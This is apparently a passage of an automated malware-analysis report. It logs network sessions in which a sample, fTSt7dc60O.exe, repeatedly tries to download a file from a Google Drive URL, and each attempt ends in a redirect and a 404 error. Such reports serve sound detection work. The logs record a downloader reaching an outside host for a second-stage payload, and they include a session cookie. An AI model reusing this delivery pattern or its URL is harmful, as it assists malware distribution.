                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:48:20 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:48:20 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-qvA9fZE50wfwpZXAMIxJiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.1049994142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:48:20 UTC463OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:48:21 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgTd1oh0CeG3SntJIAMucCv06f67M_PPPTn5vno-zG6Nbfmyn1JbP3aW7flbsMu7y4cIOW-IOco
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:48:21 GMT
                                                        Content-Security-Policy: script-src 'nonce-_rEI8luldQgxoQuGXZzoFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-10 14:48:21 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 79 6c 51 56 4e 4d 47 65 76 70 6a 6b 69 6a 67 68 35 63 53 6b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lylQVNMGevpjkijgh5cSkw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.1049995216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:48:31 UTC421OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:48:32 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:48:32 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-IHZZCybQk2imLl8xrutbbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.1049996142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:48:33 UTC463OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:48:33 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgTAqe29_ykAqMNRjInn42S0g0xlQpRHb8VoYHkijIeYPobs8UlIQgFc8B2q8J3iDkVf
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:48:33 GMT
                                                        Content-Security-Policy: script-src 'nonce-nMPm-yEITdWDIAlLrx1YtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-10 14:48:33 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 2d 77 79 35 51 2d 45 32 5f 43 53 64 6c 59 42 4f 6e 7a 64 70 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u-wy5Q-E2_CSdlYBOnzdpg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.1049997216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:48:44 UTC421OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:48:44 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:48:44 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-4Vd0H_beh_hjEPqwMMhSvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.1049998142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:48:45 UTC463OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:48:45 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgRotL0hzNxVtacOlIu-mrzqDaSJJr5uUHv_zWNmWsThyzkAemB-o63QlKopG0Jxcxzk
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:48:45 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-WgKGoPgOHUz9qZpUkxGPaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-10 14:48:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 51 34 53 73 43 54 67 51 41 47 2d 6f 47 7a 4e 30 4a 73 79 4b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eQ4SsCTgQAG-oGzN0JsyKw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.1049999216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:48:56 UTC421OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:48:56 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:48:56 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-HOCxBrsuPWR-WlYwfjzjfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.1050000142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:48:57 UTC463OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:48:58 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC66S50jI2fHwrI6ZGTYKvhwbsVLEXxscAYaXG-Sgp0AeVvVK0pH06-l-7aNY4rxunlpkShV0LM
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:48:58 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-C3TtbhlhJj5WAQk_IbEDag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
